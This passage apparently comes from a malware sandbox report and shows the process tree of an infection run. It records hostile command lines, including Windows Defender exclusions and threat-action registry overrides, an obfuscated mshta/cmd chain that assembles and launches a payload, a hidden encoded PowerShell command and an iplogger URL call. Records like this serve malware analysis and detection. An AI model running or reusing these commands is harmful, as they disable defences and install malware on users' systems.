C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1360
7⤵
- Program crash
PID:6028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit
7⤵
PID:5612

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5600

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Mixruzki1.bmp.exe" /f
8⤵
- Kills process with taskkill
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 700
7⤵
- Program crash
PID:2192

C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe"
6⤵
- Executes dropped EXE
PID:2864

C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4144

C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe"
6⤵
PID:2200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 2124
7⤵
- Program crash
PID:6924

C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2308

C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"
6⤵
PID:2184

C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"
7⤵
- Executes dropped EXE
PID:5148

C:\Users\Admin\AppData\Local\Temp\73EJMGJJ582ELDD.exe
"C:\Users\Admin\AppData\Local\Temp\73EJMGJJ582ELDD.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5996

C:\Users\Admin\AppData\Local\Temp\73EJMGJJ582ELDD.exe
"C:\Users\Admin\AppData\Local\Temp\73EJMGJJ582ELDD.exe"
9⤵
- Executes dropped EXE
PID:6040

C:\Users\Admin\AppData\Local\Temp\D0DD1K1KGDH70KC.exe
"C:\Users\Admin\AppData\Local\Temp\D0DD1K1KGDH70KC.exe"
8⤵
PID:5696

C:\Users\Admin\AppData\Local\Temp\D0DD1K1KGDH70KC.exe
"C:\Users\Admin\AppData\Local\Temp\D0DD1K1KGDH70KC.exe"
9⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\H62B2E4L6G53K0B.exe
"C:\Users\Admin\AppData\Local\Temp\H62B2E4L6G53K0B.exe"
8⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\H62B2E4L6G53K0B.exe
"C:\Users\Admin\AppData\Local\Temp\H62B2E4L6G53K0B.exe"
9⤵
PID:3212

C:\Users\Admin\AppData\Local\Temp\48DIMIB7M818I9A.exe
"C:\Users\Admin\AppData\Local\Temp\48DIMIB7M818I9A.exe"
8⤵
PID:4876

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\mWH_.CpL",
9⤵
PID:5188

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\mWH_.CpL",
10⤵
PID:6184

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\mWH_.CpL",
11⤵
PID:1712

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\mWH_.CpL",
12⤵
PID:6948

C:\Users\Admin\AppData\Local\Temp\9JBK331J29I65J6.exe
https://iplogger.org/1x5az7
8⤵
PID:3156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue170afd12d42ebebc.exe
4⤵
PID:2120

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue170afd12d42ebebc.exe
Tue170afd12d42ebebc.exe
5⤵
- Executes dropped EXE
PID:5028

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"
6⤵
PID:6668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'
7⤵
PID:7008

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"
6⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe
"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"
7⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
6⤵
PID:6824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
7⤵
PID:7148

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jzagqsze.vbs"
7⤵
PID:7068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\
8⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue176bbcd87e22b8288.exe
4⤵
PID:3540

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue176bbcd87e22b8288.exe
Tue176bbcd87e22b8288.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2588

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue176bbcd87e22b8288.exe
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue176bbcd87e22b8288.exe
6⤵
- Executes dropped EXE
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue17775f71f24d3bd22.exe
4⤵
PID:3820

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17775f71f24d3bd22.exe
Tue17775f71f24d3bd22.exe
5⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue17ed14d9ee5c3ff8.exe
4⤵
PID:2604

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17ed14d9ee5c3ff8.exe
Tue17ed14d9ee5c3ff8.exe
5⤵
- Executes dropped EXE
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue17beba4c6a.exe
4⤵
PID:2820

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17beba4c6a.exe
Tue17beba4c6a.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2772

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
6⤵
PID:2400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
7⤵
PID:5448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue17f183b40bf8f0ac9.exe
4⤵
PID:1676

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17f183b40bf8f0ac9.exe
Tue17f183b40bf8f0ac9.exe
5⤵
- Executes dropped EXE
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 628
4⤵
- Program crash
PID:3096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue178b91461917e3f4.exe
4⤵
PID:2328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1780fd628d8744.exe
4⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1776d0c3c20.exe
4⤵
PID:2628

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1780fd628d8744.exe
Tue1780fd628d8744.exe
1⤵
PID:4024

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:1632

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:2624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4884 -ip 4884
1⤵
PID:4068

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1764717dab33f7d.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1764717dab33f7d.exe" /SILENT
1⤵
- Executes dropped EXE
PID:2060

C:\Users\Admin\AppData\Local\Temp\is-2F7FJ.tmp\Tue1764717dab33f7d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2F7FJ.tmp\Tue1764717dab33f7d.tmp" /SL5="$20206,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1764717dab33f7d.exe" /SILENT
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3676

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1704dd8cbe507b.exe
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1704dd8cbe507b.exe
1⤵
- Executes dropped EXE
PID:1716

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17775f71f24d3bd22.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17775f71f24d3bd22.exe" -u
1⤵
- Executes dropped EXE
PID:3952

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe ( CReATEoBjEcT( "wSCRipT.SheLL" ).Run ( "cMd.exE /q /r type ""C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17beba4c6a.exe"" > EBJ_WI9BHA.Exe && STArt EBJ_Wi9BHA.Exe /pngCwMSc8WvFjhu5aEoUruzOID &IF """" == """" for %U in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17beba4c6a.exe"" ) do taskkill /f /im ""%~NxU"" ",0,trUe) )
1⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r type "C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17beba4c6a.exe" > EBJ_WI9BHA.Exe && STArt EBJ_Wi9BHA.Exe /pngCwMSc8WvFjhu5aEoUruzOID&IF "" == "" for %U in ( "C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17beba4c6a.exe" ) do taskkill /f /im "%~NxU"
2⤵
PID:3664

C:\Users\Admin\AppData\Local\Temp\EBJ_WI9BHA.Exe
EBJ_Wi9BHA.Exe /pngCwMSc8WvFjhu5aEoUruzOID
3⤵
PID:3816

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe ( CReATEoBjEcT( "wSCRipT.SheLL" ).Run ( "cMd.exE /q /r type ""C:\Users\Admin\AppData\Local\Temp\EBJ_WI9BHA.Exe"" > EBJ_WI9BHA.Exe && STArt EBJ_Wi9BHA.Exe /pngCwMSc8WvFjhu5aEoUruzOID &IF ""/pngCwMSc8WvFjhu5aEoUruzOID"" == """" for %U in ( ""C:\Users\Admin\AppData\Local\Temp\EBJ_WI9BHA.Exe"" ) do taskkill /f /im ""%~NxU"" ",0,trUe) )
4⤵
PID:4564

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r type "C:\Users\Admin\AppData\Local\Temp\EBJ_WI9BHA.Exe" > EBJ_WI9BHA.Exe && STArt EBJ_Wi9BHA.Exe /pngCwMSc8WvFjhu5aEoUruzOID&IF "/pngCwMSc8WvFjhu5aEoUruzOID" == "" for %U in ( "C:\Users\Admin\AppData\Local\Temp\EBJ_WI9BHA.Exe" ) do taskkill /f /im "%~NxU"
5⤵
PID:2776

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCriPt: closE (CReATeoBject("wsCRipt.ShELl" ). RuN ( "C:\Windows\system32\cmd.exe /r EchO | sEt /P = ""MZ"" > wXM_ZVU.7XS& CoPY /y /b WXM_ZVu.7XS + VK~2.cIM + HDLEI.yB + KfrJ.CZC +IM4~XL2.l xIHL.vD&stARt msiexec.exe -Y .\xiHL.vD " , 0, tRUe ))
4⤵
- Checks computer location settings
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /r EchO | sEt /P = "MZ" >wXM_ZVU.7XS& CoPY /y /b WXM_ZVu.7XS+ VK~2.cIM+HDLEI.yB + KfrJ.CZC +IM4~XL2.l xIHL.vD&stARt msiexec.exe -Y .\xiHL.vD
5⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EchO "
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>wXM_ZVU.7XS"
6⤵
- Checks computer location settings
PID:4564

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\xiHL.vD
6⤵
- Loads dropped DLL
PID:1396

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "Tue17beba4c6a.exe"
3⤵
- Kills process with taskkill
PID:4500

C:\Users\Admin\AppData\Local\Temp\is-IMS2U.tmp\Tue1764717dab33f7d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IMS2U.tmp\Tue1764717dab33f7d.tmp" /SL5="$601C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1764717dab33f7d.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:792

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1776d0c3c20.exe
Tue1776d0c3c20.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3732

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue178b91461917e3f4.exe
Tue178b91461917e3f4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3524 -ip 3524
1⤵
PID:3440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3524 -ip 3524
1⤵
PID:4336

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3280

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:1968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 608
3⤵
- Program crash
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3524 -ip 3524
1⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1968 -ip 1968
1⤵
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3524 -ip 3524
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3524 -ip 3524
1⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3524 -ip 3524
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3524 -ip 3524
1⤵
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3524 -ip 3524
1⤵
PID:4120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3524 -ip 3524
1⤵
- Executes dropped EXE
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4432 -ip 4432
1⤵
PID:5180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4432 -ip 4432
1⤵
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4432 -ip 4432
1⤵
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4432 -ip 4432
1⤵
PID:6048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4432 -ip 4432
1⤵
PID:3300

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:5284

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 600
3⤵
- Program crash
PID:644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2276 -ip 2276
1⤵
PID:3436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4432 -ip 4432
1⤵
PID:5396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4432 -ip 4432
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4432 -ip 4432
1⤵
PID:5928

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
1⤵
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
2⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4432 -ip 4432
1⤵
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5992 -ip 5992
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5992 -ip 5992
1⤵
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5992 -ip 5992
1⤵
PID:6272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5992 -ip 5992
1⤵
PID:6632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2200 -ip 2200
1⤵
PID:6852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5992 -ip 5992
1⤵
PID:6996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5992 -ip 5992
1⤵
PID:5400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5992 -ip 5992
1⤵
PID:5612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5992 -ip 5992
1⤵
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5992 -ip 5992
1⤵
PID:4492

C:\Users\Admin\AppData\Local\Temp\GDRPYdOHWOMIRVQbw\bnDAWlqtvsqsVUM\ReHoYmc.exe
C:\Users\Admin\AppData\Local\Temp\GDRPYdOHWOMIRVQbw\bnDAWlqtvsqsVUM\ReHoYmc.exe hO /site_id 525403 /S
1⤵
PID:3560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:4560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:5980

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:6868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:5448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:6812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:6408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4420

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:6568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:5032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
